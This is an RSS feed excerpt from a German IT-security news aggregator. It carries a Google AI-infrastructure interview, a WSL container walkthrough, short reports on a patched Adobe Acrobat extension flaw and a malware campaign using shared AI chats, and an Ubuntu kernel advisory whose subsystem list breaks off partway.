<title><![CDATA[Q&A: Google’s AI and computing chief talks about its shapeshifting data centers]]></title>
<description><![CDATA[Google’s AI offerings span its internal and cloud offerings. Its data centers are processing seven times more AI tokens compared to last year. To keep up, Google is upgrading its data-center hardware and software technologies at a faster clip. It plans to raise $80 billion to build new data cente...]]></description>
<link>https://tsecurity.de/de/3689101/it-security-nachrichten/qa-googles-ai-and-computing-chief-talks-about-its-shapeshifting-data-centers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689101/it-security-nachrichten/qa-googles-ai-and-computing-chief-talks-about-its-shapeshifting-data-centers/</guid>
<pubDate>Thu, 23 Jul 2026 14:55:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google’s AI offerings span its internal and cloud offerings. Its data centers are processing seven times more AI tokens compared to last year. To keep up, Google is upgrading its data-center hardware and software technologies at a faster clip. It plans to raise $80 billion to build new data centers. (See related story: <a href="https://www.networkworld.com/article/4200581/google-transforms-its-data-center-architecture-for-agent-era.html">Google transforms its data center architecture for agent era</a>)</p>



<p class="wp-block-paragraph"><em>Network World</em> spoke with <a href="https://www.linkedin.com/in/marklohmeyer/">Mark Lohmeyer</a>, vice president and general manager of AI and computing at Google, about how the company’s infrastructure is keeping pace with AI demand.</p>



<p class="wp-block-paragraph"><strong>Network World: What is the primary shift in infrastructure needs?</strong></p>



<p class="wp-block-paragraph"><strong>Mark Lohmeyer:</strong> We’ve seen the <a href="https://www.networkworld.com/article/4175890/cisco-ai-traffic-is-radically-reshaping-wans.html">rise of agents and agentic use cases</a>. Years ago, it was the chat phase: Ask a question, get an answer. Now we’re in the agentic era, where you express your intent, agents spin off multiple sub-agents, working in parallel, preserving state. This is a radical shift in what infrastructure needs to do; make them fast, cost effective, secure, reliable. We’re delivering infrastructure optimized for the age of agents.</p>



<p class="wp-block-paragraph"><strong>NW: What’s the goal of the infrastructure buildout, and what should customers expect regarding costs?</strong></p>



<p class="wp-block-paragraph"><strong>ML: </strong>Ultimately, it’s about enabling customers with leading-edge capabilities and models at scale cost-effectively. With agents, <a href="https://www.networkworld.com/article/4057121/network-and-cloud-implications-of-agentic-ai.html">inference transactions increase</a> by 50x, 100x versus non-agentic workloads. We’re driving the cost per transaction down exponentially. In our latest platforms, we reduce the cost by almost 2x for the same work. Customers serve twice the number of users at the same cost, directly driving profitability.</p>



<p class="wp-block-paragraph"><strong>NW: How are you addressing energy efficiency?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> Energy is a critical resource, and Google has optimized for years. We design data centers and compute [to drive] high PUE (power usage effectiveness). We introduced <a href="https://www.networkworld.com/article/4149069/why-ai-rack-densities-make-liquid-cooling-nonnegotiable.html">liquid cooling</a> over five years ago, and these latest systems are all liquid cooled. For agentic workloads, CPUs come to the forefront… orchestrating agents, calling tools, doing evaluation loops in reinforcement learning. Our latest Axion-based CPU platform called <a href="https://www.networkworld.com/article/4086182/google-cloud-aims-for-more-cost-effective-arm-computing-with-axion-n4a.html">N4A</a> has energy efficiency and is significantly better than the prior generation and x86 comparables.</p>



<p class="wp-block-paragraph"><strong>NW: How do you think about token efficiency as you build-out systems?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> Performance and efficiency gains are powered by co-design of the model and infrastructure. <a href="https://www.computerworld.com/article/4161990/gemini-enterprise-update-brings-ai-agents-into-collaborative-workflows.html">Gemini</a> is trained on TPUs, primarily served on TPUs with high frontier model capability, in a token and cost-efficient way. This stems from co-design across the full stack.</p>



<p class="wp-block-paragraph"><strong>NW: How do you project what infrastructure will be needed years in advance?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> Hardware cycles deliver a new next generation roughly every year, but design cycles are two years or more in advance. We work with <a href="https://deepmind.google/about/">DeepMind</a> doing core research, to application teams taking models into production, to billions of users, to our team building infrastructure. We work upstream with DeepMind and application teams to understand what’s coming. Agents weren’t being broadly spoken of externally, but internally we had those insights around what they would need. That shows up in hardware design. We hit the timing right — these platforms are built for agents.</p>



<p class="wp-block-paragraph"><strong>NW: What’s the eighth generation TPU platform?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> We deliver new platforms every year, and ones launched years ago are close to 100% utilized because demand for AI-optimized compute is high. The <a href="https://www.networkworld.com/article/4162004/google-bets-on-workload-specific-tpus-with-8t-and-8i-launch.html">eighth-generation TPU platform</a> is the first delivering two complete systems, from the chip all the way up to the network and storage and software, that are optimized.</p>



<p class="wp-block-paragraph"><a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive">TPU-8t</a> is optimized for training, and TPU-8i is optimized for inference. For TPU-8i, we increased SRAM on the chip to 384MB — three times the prior generation — and increased the HBM by 50%.</p>



<p class="wp-block-paragraph"><strong>NW: How are you approaching GPU and TPU compatibility?</strong></p>



<p class="wp-block-paragraph"><strong>ML: </strong>People in a single cluster do not commingle GPUs and TPUs. We offer both options based on specific workload needs. We’ve been investing on the TPU side in using software frameworks customers are comfortable with on GPUs and enabling those on TPUs. For example, <a href="https://www.infoworld.com/article/2335194/what-is-pytorch-python-machine-learning-on-gpus.html">PyTorch</a> and vLLM. Customers could have a pool of GPUs and TPUs, running vLLM on top of that. Start with a workload on TPUs, but if the TPU pool is fully utilized, spill to GPUs or vice versa. This works because it’s all leveraging the same compatible software layer on top.</p>



<p class="wp-block-paragraph"><strong>NW: How has the orchestration platform changed for agents?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> Kubernetes is becoming the orchestration platform of choice for AI. Google is transforming <a href="https://www.infoworld.com/article/2255921/gke-tutorial-get-started-with-google-kubernetes-engine.html">GKE</a> [Google Kubernetes Engine] into an agent-native orchestration solution. When expressing intent to an agent and it spins up multiple sub-agents, compute needs to spin up rapidly — TPUs or GPUs — without long delays, then run and spin back down. We’re optimizing at every layer of the <a href="https://cloud.google.com/kubernetes-engine">GKE stack</a>: significantly improving node startup time and how rapidly we start and stop containers. Lovable demonstrates this with GKE, spinning up hundreds of sandboxes for live coding sessions on their platform in parallel, paying for infrastructure when needed.</p>



<p class="wp-block-paragraph"><strong>NW: What is the role of the network and storage infrastructure?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> The network is critical for AI. This requires creating large-scale clusters of GPUs or TPUs and enabling them to talk to each other in a high-performance way. <a href="https://cloud.google.com/blog/products/networking/introducing-virgo-megascale-data-center-fabric">We created the Virgo network</a> — a collapsed network architecture, non-blocking within a data center, where multiple pods or NVLink72 domains connect together.</p>



<p class="wp-block-paragraph">In TPU8T, we can connect over a million TPUs together leveraging Virgo, creating large-scale, high-performance, reliable clusters that shrink innovation cycles. Storage is equally critical. In large-scale clusters, something is always failing. The ability to take snapshots and go back to a checkpoint is important.</p>



<p class="wp-block-paragraph">We’ve introduced <a href="https://cloud.google.com/products/managed-lustre">Managed Lustre 10T</a>, with 10 terabytes per second of bandwidth, 18 petabytes of storage in single clusters. This is 10 times faster than last year and 20 times faster than competition. We have Rapid Bucket, low-latency storage backed by Google storage systems. Both are impactful in large-scale training environments.</p>



<p class="wp-block-paragraph"><strong>NW: How does KV cache strategy differ between training and inference?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> For <a href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/">TPU-8i</a>, we increased SRAM on the chip to 384 megabytes — three times the prior generation — and increased the HBM by 50%. Storing KV cache directly in chip memory allows responding to inference requests much more rapidly and cost-effectively than going to an external system. For inference workloads, storing as much KV cache as possible on-chip is critical.</p>



<p class="wp-block-paragraph">We’re introducing a dedicated KV cache storage subsystem that works across GPUs and TPUs. As KV caches get larger, being able to fall back to this dedicated subsystem becomes critical. Loading model weights rapidly is important in dynamic inference environments where accelerators switch between models hour by hour.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp Web chats exposed by Adobe’s Acrobat extension flaw]]></title>
<description><![CDATA[HermeticReader is a now-patched vulnerability in Adobe’s popular Acrobat Chrome extension that could have been used to spy on WhatsApp Web users. This article has been indexed from Malwarebytes Read the original article: WhatsApp Web chats exposed by Adobe’s Acrobat…
Read more →
The post WhatsApp...]]></description>
<link>https://tsecurity.de/de/3688985/it-security-nachrichten/whatsapp-web-chats-exposed-by-adobes-acrobat-extension-flaw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688985/it-security-nachrichten/whatsapp-web-chats-exposed-by-adobes-acrobat-extension-flaw/</guid>
<pubDate>Thu, 23 Jul 2026 14:13:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>HermeticReader is a now-patched vulnerability in Adobe’s popular Acrobat Chrome extension that could have been used to spy on WhatsApp Web users. This article has been indexed from Malwarebytes Read the original article: WhatsApp Web chats exposed by Adobe’s Acrobat…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/whatsapp-web-chats-exposed-by-adobes-acrobat-extension-flaw/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/whatsapp-web-chats-exposed-by-adobes-acrobat-extension-flaw/">WhatsApp Web chats exposed by Adobe’s Acrobat extension flaw</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ganz ohne Chemie: Weltgrößte Testanlage für Schwungrad-Speicher entsteht in Shanghai]]></title>
<description><![CDATA[Qnetic baut in Shanghai eine Testanlage für Schwungrad-Energiespeicher, die nach eigenen Angaben die größte ihrer Art werden soll. Parallel dazu montiert das Team den ersten Prototypen der Baureihe Pulsar, einen Schwungradspeicher mit 200 Kilowattstunden Kapazität. Beide Vorhaben markieren einen ...]]></description>
<link>https://tsecurity.de/de/3688925/it-nachrichten/ganz-ohne-chemie-weltgroesste-testanlage-fuer-schwungrad-speicher-entsteht-in-shanghai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688925/it-nachrichten/ganz-ohne-chemie-weltgroesste-testanlage-fuer-schwungrad-speicher-entsteht-in-shanghai/</guid>
<pubDate>Thu, 23 Jul 2026 13:50:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Qnetic baut in Shanghai eine Testanlage für Schwungrad-Energiespeicher, die nach eigenen Angaben die größte ihrer Art werden soll. Parallel dazu montiert das Team den ersten Prototypen der Baureihe Pulsar, einen Schwungradspeicher mit 200 Kilowattstunden Kapazität. Beide Vorhaben markieren einen wichtigen Schritt auf dem Weg von der Entwicklung zur kommerziellen Vermarktung der Technologie. Kinetische Energie statt …]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp Web chats exposed by Adobe&#8217;s Acrobat extension flaw]]></title>
<description><![CDATA[HermeticReader is a now-patched vulnerability in Adobe's popular Acrobat Chrome extension that could have been used to spy on WhatsApp Web users.]]></description>
<link>https://tsecurity.de/de/3688902/it-security-nachrichten/whatsapp-web-chats-exposed-by-adobe8217s-acrobat-extension-flaw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688902/it-security-nachrichten/whatsapp-web-chats-exposed-by-adobe8217s-acrobat-extension-flaw/</guid>
<pubDate>Thu, 23 Jul 2026 13:45:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[HermeticReader is a now-patched vulnerability in Adobe's popular Acrobat Chrome extension that could have been used to spy on WhatsApp Web users.]]></content:encoded>
</item>
<item>
<title><![CDATA[„ClaudeFix“: Wenn geteilte KI-Chats zur Malware-Falle werden]]></title>
<description><![CDATA[Sicherheitsforscher von Zscaler haben eine neue Angriffskampagne entdeckt, bei der Cyberkriminelle manipulierte KI-Chats nutzen, um Schadsoftware zu verbreiten. 

Tags: #Claude | #Malware]]></description>
<link>https://tsecurity.de/de/3688584/it-security-nachrichten/claudefix-wenn-geteilte-ki-chats-zur-malware-falle-werden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688584/it-security-nachrichten/claudefix-wenn-geteilte-ki-chats-zur-malware-falle-werden/</guid>
<pubDate>Thu, 23 Jul 2026 11:52:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/08/Claude-Quelle-Robert-Way-Shutterstock-2459779553-1920.jpg" class="attachment-full size-full wp-post-image" alt="Claude" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/08/Claude-Quelle-Robert-Way-Shutterstock-2459779553-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/08/Claude-Quelle-Robert-Way-Shutterstock-2459779553-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/08/Claude-Quelle-Robert-Way-Shutterstock-2459779553-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/08/Claude-Quelle-Robert-Way-Shutterstock-2459779553-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/08/Claude-Quelle-Robert-Way-Shutterstock-2459779553-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="„ClaudeFix“: Wenn geteilte KI-Chats zur Malware-Falle werden 1"></p>
    Sicherheitsforscher von Zscaler haben eine neue Angriffskampagne entdeckt, bei der Cyberkriminelle manipulierte KI-Chats nutzen, um Schadsoftware zu verbreiten. 

<p>Tags: <a href="https://www.it-daily.net/thema/claude">#Claude</a> | <a href="https://www.it-daily.net/thema/malware">#Malware</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe Acrobat: Populäres Chrome-Add-on hat Whatsapp-Datenklau ermöglicht]]></title>
<description><![CDATA[Über 300 Millionen Nutzer vertrauen einer Chrome-Erweiterung von Adobe. Angreifer hätten darüber jedoch leicht Whatsapp-Chats ausleiten können. (Sicherheitslücke, Browser)]]></description>
<link>https://tsecurity.de/de/3688549/it-nachrichten/adobe-acrobat-populaeres-chrome-add-on-hat-whatsapp-datenklau-ermoeglicht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688549/it-nachrichten/adobe-acrobat-populaeres-chrome-add-on-hat-whatsapp-datenklau-ermoeglicht/</guid>
<pubDate>Thu, 23 Jul 2026 11:43:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Über 300 Millionen Nutzer vertrauen einer Chrome-Erweiterung von Adobe. Angreifer hätten darüber jedoch leicht Whatsapp-Chats ausleiten können. (<a href="https://www.golem.de/specials/sicherheitsluecke/">Sicherheitslücke</a>, <a href="https://www.golem.de/specials/browser/">Browser</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=211189&amp;page=1&amp;ts=1784798642" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe Patches Acrobat Chrome Extension Flaw That Exposed WhatsApp Web Chats to Any Website]]></title>
<description><![CDATA[Adobe has patched a series of vulnerabilities in its Acrobat Chrome extension that previously allowed any website to access conversations in WhatsApp Web withou Thank you for being a Ghacks reader. The post Adobe Patches Acrobat Chrome Extension Flaw That…
Read more →
The post Adobe Patches Acrob...]]></description>
<link>https://tsecurity.de/de/3688490/it-security-nachrichten/adobe-patches-acrobat-chrome-extension-flaw-that-exposed-whatsapp-web-chats-to-any-website/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688490/it-security-nachrichten/adobe-patches-acrobat-chrome-extension-flaw-that-exposed-whatsapp-web-chats-to-any-website/</guid>
<pubDate>Thu, 23 Jul 2026 11:13:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Adobe has patched a series of vulnerabilities in its Acrobat Chrome extension that previously allowed any website to access conversations in WhatsApp Web withou Thank you for being a Ghacks reader. The post Adobe Patches Acrobat Chrome Extension Flaw That…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/adobe-patches-acrobat-chrome-extension-flaw-that-exposed-whatsapp-web-chats-to-any-website/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/adobe-patches-acrobat-chrome-extension-flaw-that-exposed-whatsapp-web-chats-to-any-website/">Adobe Patches Acrobat Chrome Extension Flaw That Exposed WhatsApp Web Chats to Any Website</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WSL container: A quiet revolution for Windows development]]></title>
<description><![CDATA[Running containers on Windows has never been as easy as it should be. While there are versions of Docker Desktop and Podman that work with both the Windows Subsystem for Linux (WSL) and Hyper-V, I’ve found both overly complex and unstable. Where they have worked, it’s turned out that Hyper-V has ...]]></description>
<link>https://tsecurity.de/de/3688476/ai-nachrichten/wsl-container-a-quiet-revolution-for-windows-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688476/ai-nachrichten/wsl-container-a-quiet-revolution-for-windows-development/</guid>
<pubDate>Thu, 23 Jul 2026 11:07:20 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Running containers on Windows has never been as easy as it should be. While there are versions of <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html" data-type="link" data-id="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker Desktop</a> and <a href="https://www.infoworld.com/article/2335683/what-is-podman-and-will-it-replace-docker.html" data-type="link" data-id="https://www.infoworld.com/article/2335683/what-is-podman-and-will-it-replace-docker.html">Podman</a> that work with both the Windows Subsystem for Linux (WSL) and Hyper-V, I’ve found both overly complex and unstable. Where they have worked, it’s turned out that Hyper-V has been the best option, using a Linux virtual machine to host my containers. That all adds up to overhead, layers of virtual infrastructure that get in the way of work and that need to be rebuilt every time I restart my PC.</p>



<p class="wp-block-paragraph">Part of the problem is WSL. It’s a good tool, but WSL2’s file-system integration is slow, and you’re left having to work with code using Visual Studio Code’s remote integration, which means putting a <a href="https://code.visualstudio.com/docs/remote/vscode-server" data-type="link" data-id="https://code.visualstudio.com/docs/remote/vscode-server">VS Code Server</a> in every container you’re building and testing. If you’re working with <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html" data-type="link" data-id="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>, that’s even more complexity that needs to be managed, dragging you away from code.</p>



<p class="wp-block-paragraph">I ended up running most of my container testing and development from a separate machine, a Linux server running containerd. But though it worked (and had all the resources of workstation-class device), it wasn’t portable, and for some reason I’ve yet to uncover, Ubuntu’s remote desktop access doesn’t work for me.</p>



<p class="wp-block-paragraph">So, it was good to see Microsoft make several announcements around WSL at <a href="https://news.microsoft.com/build-2026/">Build 2026</a> as part of <a href="https://www.infoworld.com/article/4188967/making-windows-a-developer-platform-again.html">a push to make Windows a developer platform again</a>. The first, an improved WSL3, is still some way away, but the second, <a href="https://devblogs.microsoft.com/commandline/wsl-container-is-now-available-for-public-preview/">WSL-native container support</a>, shipped at the end of June. It is already seeing community-driven development of Docker Desktop-like tooling to help monitor and manage your containers.</p>



<p class="wp-block-paragraph">Delivering a WSL-based container platform fits in with the other developer-focused Windows announcements at Build. Making Windows behave more like Linux is Microsoft responding to developer needs, given that more than 50% of servers on Azure run a Linux distribution. Linux is the basis of cloud-native infrastructure, so developers need to be able to build on it wherever they are.</p>



<h2 class="wp-block-heading">Getting started with WSL container</h2>



<p class="wp-block-paragraph">WSL container provides a new CLI that works in parallel to the familiar WSL, with commands to support the entire container life cycle, from creation to shut down. All you need to do to get started is upgrade your WSL installation to the current pre-release build (at the time of writing this was 2.9.3). Simply open an administrator PowerShell terminal and enter <code>wsl --update --pre-release</code>.</p>



<p class="wp-block-paragraph">This downloads and installs the latest WSL release. Once you’ve closed and re-opened your terminal (to ensure that you’ve updated its context) you can check that WSLC has installed by entering <code>wslc</code>, which should <a href="https://learn.microsoft.com/en-us/windows/wsl/tutorials/wsl-containers" data-type="link" data-id="https://learn.microsoft.com/en-us/windows/wsl/tutorials/wsl-containers">list the available commands</a>. The new CLI is aliased to WSL container, if you prefer to keep your container work separate from WSL (and avoid typos that might accidentally affect your WSL installations).</p>



<p class="wp-block-paragraph">Under the hood Microsoft is using WSL container to trial new integration points for Linux in Windows. One key change is the use of a new file system that significantly speeds up access to Windows from inside a container. Another improvement gives WSL container a new networking mode that relays networking connections directly through the Windows network stack, ensuring it has access to the same resources and security as Windows.</p>



<h2 class="wp-block-heading">Calling Linux containers from Windows applications</h2>



<p class="wp-block-paragraph">Things get more interesting when you start to use the <a href="https://wsl.dev/api-reference/">WSL container API</a> from inside your Windows code. Here you can include calls to Linux containers inside your desktop applications, taking advantage of existing services, building and deploying containers from inside your CI/CD pipeline. Using the new file system and networking stack helps reduce the friction that comes with crossing the boundaries between the two platforms.</p>



<p class="wp-block-paragraph">The WSL container API is available as a NuGet package, with support for C, C#, and C++. It allows your code to start and stop containers, and interact directly with them, sending command-line calls and reading back responses. Where things get interesting is being able to launch a containerized service from your code, exposing its REST or gRPC APIs on a local network port. Microsoft has provided <a href="https://github.com/microsoft/WSL/tree/master/doc/samples">sample code</a> to show you what’s possible at this early stage.</p>



<p class="wp-block-paragraph">Microsoft is doing something revolutionary here. It’s taking the cloud-native, service-driven model and bringing it into Windows and using it to bridge decades of divergent development. You no longer have to rewrite a service that works on Linux to run in Windows; all you need to do is containerize the service and launch it from the WSL container API. When you’re done, the API will tidy up after you, shutting down the container and reclaiming the memory it used.</p>



<p class="wp-block-paragraph">It’s important to remember that this is only the first public preview of a rapidly developing platform. There are many opportunities here to, say, build on the syscall translation layer developed for WSL1 to produce a native Windows-to-Linux application integration stack that removes the overhead of using web-based service calls. It will be interesting to see what develops, but this first release is very interesting indeed.</p>



<h2 class="wp-block-heading">Manage Linux containers from Windows</h2>



<p class="wp-block-paragraph">If you want a Docker Desktop-like experience for building and testing containers on Windows developer hardware, you may not have long to wait. WSL container’s underlying API is already being used to build tools that manage and monitor containers for you. One such tool is the <a href="https://github.com/mhackermsft/wslcontainerdesktop" data-type="link" data-id="https://github.com/mhackermsft/wslcontainerdesktop">WSL Container Desktop</a>, under development on GitHub. While there aren’t any release builds yet, it’s easy enough to compile and get running by cloning the source repository and building using the .NET CLI. You do need to have the <a href="https://github.com/microsoft/windowsappsdk" data-type="link" data-id="https://github.com/microsoft/windowsappsdk">Windows App SDK</a> installed, and some features require access to the Azure CLI.</p>



<p class="wp-block-paragraph">WSL Container Desktop is built in C#, with a WinUI front end. It’s currently only verified for use on x64, though I was able to compile and run it on an Arm64 PC and use it to test and run containers. Once running, it gives you a well-designed front end for your WSL-hosted containers, showing what’s running and what resources they are using. You can link WSL Container Desktop to container registries, like Docker’s and Azure’s, so you can quickly pull base containers and then use the WSL container environment to add your own code and customizations.</p>



<p class="wp-block-paragraph">Your main interaction point is the WSL Container Desktop dashboard, which shows what containers are running and their current resource usage. Elements are displayed in cards, taking a cue from Windows’ own user interface and especially from its Settings app. From the dashboard, you can drill down into the available containers, with quick start, stop, and reload options, as well as an extended memory that includes the ability to open a web browser to the appropriate port. I tested this with a container that included an entire KDE webtop, giving me a Linux distro running in a container in my browser.</p>



<p class="wp-block-paragraph">Other options include a details view that displays current logs and provides tools for inspecting the state of a container. This is the type of tool that comes in useful when debugging and testing container applications, as it can provide insights that the WSL container CLI doesn’t offer. Another option helps you clean up after you’ve downloaded an image and don’t need it anymore, with analytics that show the largest images and images you haven’t used for some time. On top of its tooling for working with WSL containers, WSL Container Desktop provides a basic settings tool that helps you configure its look and feel, as well as how it integrates with Windows.</p>



<h2 class="wp-block-heading">Run Kubernetes inside Windows for cloud-native development</h2>



<p class="wp-block-paragraph">One of the more useful features of WSL Container Desktop is the ability to quickly stand up a <a href="https://k3s.io/" data-type="link" data-id="https://k3s.io/">K3s</a> Kubernetes instance in WSL that can be used to host WSL containers, providing a local environment to build and test cloud-native applications wherever you might be. The K3s tooling offers a similar experience to the Kubernetes project’s own <a href="https://www.infoworld.com/article/3964051/headlamp-a-multicluster-kubernetes-user-interface.html">Headlamp UI</a>, making it easy to go between your development environment and a production Kubernetes cluster.</p>



<p class="wp-block-paragraph">It’s fair to describe WSL container as one of those Windows features you didn’t think you needed, but now it’s here you can’t live without it. WSL container simplifies building a container development tool chain in Windows, and at the same time allows you to think about a new generation of hybrid applications that take advantage of decades of development in both Windows and Linux.</p>



<p class="wp-block-paragraph">The result is something that was unimaginable a few years ago: dropping a Linux container into the middle of a Windows application and treating it as another local service. As the WSL container platform evolves, you should expect to see more ways of bringing Linux and Windows together, using containers to deliver a hybrid platform that gives us the best of both worlds at long last.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8595-1: Linux kernel (Oracle) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3688352/unix-server/usn-8595-1-linux-kernel-oracle-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688352/unix-server/usn-8595-1-linux-kernel-oracle-vulnerabilities/</guid>
<pubDate>Thu, 23 Jul 2026 10:20:43 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
